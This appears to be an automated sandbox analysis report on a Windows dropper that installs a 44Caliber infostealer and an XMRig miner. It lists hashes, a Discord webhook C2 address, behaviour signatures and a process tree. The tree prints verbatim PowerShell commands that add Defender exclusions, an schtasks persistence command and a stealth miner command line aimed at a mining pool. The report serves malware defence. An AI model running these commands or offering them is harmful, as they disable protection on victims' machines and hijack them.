Analysis

  • max time kernel: 167s
  • max time network: 184s
  • platform: windows10-2004_x64
  • resource: win10v2004-20220310-en
  • submitted: 20-03-2022 05:19

General

  • Target: 86523374.exe
  • Size: 5.2MB
  • MD5: 23c2521d2d7f41cdc515db9c7a7d6dcb
  • SHA1: ba422cc6f49b1639d35d61ea9ddec24149649929
  • SHA256: e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
  • SHA512: 486ce40687b16f67d8f1473ecc31aadd979fff43bc836b48d502efcf5eb91e1de60f3e47c0e1df0592b17bf7992016c13534fdd2c5afb2b3f1f4482262340bfa

Malware Config

Extracted

  • Family: 44caliber
  • C2: https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW

Signatures

  • 44Caliber
    An open source infostealer written in C#.
  • xmrig
    XMRig is a high performance, open source, cross platform CPU/GPU miner.
  • XMRig Miner Payload (3 IoCs)
  • Executes dropped EXE (5 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoCs)
    Looks up country code configured in the registry, likely geofence.
  • Reads user/profile data of web browsers (2 TTPs)
    Infostealers often target stored browser data, which can include saved credentials etc.
  • Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
  • Looks up external IP address via web service (2 IoCs)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • Drops file in System32 directory (4 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Program crash (2 IoCs)
  • Checks processor information in registry (2 TTPs, 2 IoCs)
    Processor information is often read in order to detect sandboxing environments.
  • Creates scheduled task(s) (1 TTPs, 1 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Suspicious behavior: EnumeratesProcesses (15 IoCs)
  • Suspicious use of AdjustPrivilegeToken (7 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoCs)
  • Suspicious use of WriteProcessMemory (58 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\86523374.exe
    "C:\Users\Admin\AppData\Local\Temp\86523374.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Users\Admin\AppData\Local\Temp\KLNR.exe
      "C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\SysWOW64\fondue.exe
        "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\system32\FonDUE.EXE
          "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
          4⤵
          PID:1112
    • C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
      "C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
      2⤵
      • Executes dropped EXE
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4496
    • C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
      "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2136
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1652
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            5⤵
            • Creates scheduled task(s)
            PID:844
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4900
          • C:\Windows\system32\services64.exe
            C:\Windows\system32\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1100
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              6⤵
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4624
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1736
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1904
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4156
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2620
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                  PID:4468
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                7⤵
                PID:2432
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2432 -s 288
                  8⤵
                  • Program crash
                  PID:2020
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2432 -s 332
                  8⤵
                  • Program crash
                  PID:1144
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 452 -p 2432 -ip 2432
    1⤵
    PID:2988
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 184 -p 2432 -ip 2432
    1⤵
    PID:4940

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
    MD5: b245679121623b152bea5562c173ba11
    SHA1: 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
    SHA256: 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
    SHA512: 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5: d85ba6ff808d9e5444a4b369f5bc2730
    SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5: cadef9abd087803c630df65264a6c81c
    SHA1: babbf3636c347c8727c35f3eef2ee643dbcc4bd2
    SHA256: cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
    SHA512: 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5: e69c5554cfe965e000e33ee9f1cd88d5
    SHA1: ef74e8e9a0113870c87ece51d4e86040b1eeecdc
    SHA256: 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
    SHA512: 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5: 9a2c763c5ff40e18e49ad63c7c3b0088
    SHA1: 4b289ea34755323fa869da6ad6480d8d12385a36
    SHA256: 517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e
    SHA512: 3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8
  • C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
    MD5: 692461c05ba5cfb84d5fcb2bc56adafd
    SHA1: c9df2056da3af20175f9ab1942058ef778c438b2
    SHA256: 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
    SHA512: 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46
  • C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
    MD5: 198458bfe3e5de2eb6737beb2d54c292
    SHA1: 59785684874f6b45205db1f96268593c97485dfe
    SHA256: d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
    SHA512: 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842
  • C:\Users\Admin\AppData\Local\Temp\KLNR.exe
    MD5: 8563f76405eb62c0e2a62f57992cb413
    SHA1: 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
    SHA256: a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
    SHA512: e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823
  • C:\Windows\System32\Microsoft\Libs\sihost64.exe
    MD5: 943c340e0da33f95572f0beb0fdf875b
    SHA1: d1081ddc04e6d52a737386d85a9193b2326ccf7c
    SHA256: 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
    SHA512: 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5
  • C:\Windows\System32\services64.exe
    MD5: 692461c05ba5cfb84d5fcb2bc56adafd
    SHA1: c9df2056da3af20175f9ab1942058ef778c438b2
    SHA256: 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
    SHA512: 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46
